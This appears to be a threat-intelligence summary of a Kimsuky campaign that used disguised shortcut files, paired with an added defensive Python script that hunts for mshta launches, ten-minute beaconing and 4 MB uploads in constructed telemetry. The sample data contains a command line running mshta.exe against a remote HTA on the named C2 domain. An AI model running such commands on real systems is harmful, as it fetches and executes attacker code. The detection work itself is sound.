Kimsuky Attack Disguised as Sex Offender Notification
2025-09-22 • Logpresso
Logpresso attributes a late-July 2025 campaign to Kimsuky that used compressed archives with sex-offender and tax-notice themes to deliver deceptive Windows shortcut files. When opened, the LNK chain runs mshta.exe to retrieve HTA and log files, shows a decoy password file, decrypts an AES-protected ZIP payload, and launches PowerShell and script stages. The malware collects system details, browser data, cryptocurrency wallet extensions, Telegram sessions, NPKI/GPKI certificates, recent documents, keyword-matched files, keystrokes, and clipboard content before encrypting and exfiltrating data. Its C2 at mailhubsec.com subdomains supports file upload, file download, PowerShell command execution, and DLL execution commands, with beaconing every ten minutes and 4 MB encrypted upload chunks. Additional loader activity uses RC4-decrypted payloads and reflective DLL injection into Chrome and Edge processes, expanding the post-infection capability set.
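The chain summarised above leaves three things in ordinary telemetry that a hunter can look for: mshta.exe started from a double-clicked shortcut and handed a remote HTA, a ten-minute beacon to one host, and uploads that arrive as roughly 4 MB POST bodies. The following is an added example, not code from the Logpresso report or from the malware itself; it runs those three checks over constructed Sysmon-style process events and proxy records. The subdomain, URL path, parent-process assumption (explorer.exe as the parent of a user-launched LNK) and every timestamp and byte count are constructed for the demonstration, not indicators taken from the report.

```python
"""Added hunting example, not code from the Logpresso report.

Three checks over constructed Sysmon-style process events and proxy records:
mshta.exe spawned from a double-clicked shortcut and pointed at a remote HTA,
roughly ten-minute beaconing to one host, and repeated ~4 MB POST bodies
(the upload chunk size). Host names, paths, timestamps and sizes are
constructed, not indicators from the report.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median
import re


@dataclass
class ProcEvent:
    ts: datetime
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str


@dataclass
class ProxyEvent:
    ts: datetime
    host: str
    method: str
    bytes_out: int   # request body size in bytes


URL_RE = re.compile(r"https?://\S+")


def mshta_from_shortcut(events):
    """mshta.exe launched under explorer.exe (assumption: the usual parent when
    a user double-clicks an LNK) with a URL or an .hta argument on its command line."""
    hits = []
    for e in events:
        if not e.image.lower().endswith("\\mshta.exe"):
            continue
        if not e.parent.lower().endswith("\\explorer.exe"):
            continue
        cl = e.cmdline.lower()
        if URL_RE.search(cl) or ".hta" in cl:
            hits.append(e)
    return hits


def periodic_hosts(events, period=timedelta(minutes=10),
                   tolerance=timedelta(seconds=30), min_requests=4):
    """Hosts whose inter-request gaps have a median within `tolerance` of `period`.
    The median survives a few extra requests (e.g. upload bursts) between beacons."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e.host].append(e.ts)
    found = {}
    for host, times in by_host.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        med = median(gaps)
        if abs(med - period) <= tolerance:
            found[host] = med
    return found


def chunked_uploads(events, chunk=4 * 1024 * 1024, slack=64 * 1024, min_chunks=2):
    """Hosts receiving at least `min_chunks` POST bodies within `slack` of `chunk`."""
    counts = defaultdict(int)
    for e in events:
        if e.method == "POST" and abs(e.bytes_out - chunk) <= slack:
            counts[e.host] += 1
    return {h: n for h, n in counts.items() if n >= min_chunks}


def hunt(proc_events, proxy_events):
    return {
        "mshta_launches": [e.cmdline for e in mshta_from_shortcut(proc_events)],
        "beacon_hosts": sorted(periodic_hosts(proxy_events)),
        "chunk_upload_hosts": sorted(chunked_uploads(proxy_events)),
    }


# Constructed sample telemetry.
T0 = datetime(2025, 7, 28, 9, 0, 0)
C2 = "sub.mailhubsec.com"   # constructed subdomain of the C2 domain named in the report

PROC_EVENTS = [
    ProcEvent(T0, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              f"mshta.exe https://{C2}/notice.hta"),          # constructed URL path
    ProcEvent(T0 + timedelta(seconds=5), r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe password.txt"),
    # mshta run by an installer on a local file: not the shortcut pattern
    ProcEvent(T0 + timedelta(minutes=2), r"C:\Program Files\Vendor\setup.exe",
              r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Temp\local.hta"),
]

PROXY_EVENTS = (
    [ProxyEvent(T0 + timedelta(minutes=10 * i), C2, "GET", 310) for i in range(6)]
    + [ProxyEvent(T0 + timedelta(minutes=51 + i), C2, "POST", 4 * 1024 * 1024 + 16)
       for i in range(3)]
    + [ProxyEvent(T0 + timedelta(minutes=m), "updates.example.com", "GET", 200)
       for m in (0, 3, 25, 60)]
    + [ProxyEvent(T0 + timedelta(minutes=7), "mail.example.com", "POST", 1200)]
)

if __name__ == "__main__":
    print(hunt(PROC_EVENTS, PROXY_EVENTS))
```

The beacon check keys on the median gap rather than the mean so that the three upload requests packed into the minutes after the last beacon do not hide the ten-minute cadence; the upload check tolerates a small header or framing overhead above the 4 MB boundary. Against real logs, the parent-process assumption is the first thing to confirm, since an LNK that launches cmd.exe or powershell.exe first will put a different parent in front of mshta.exe.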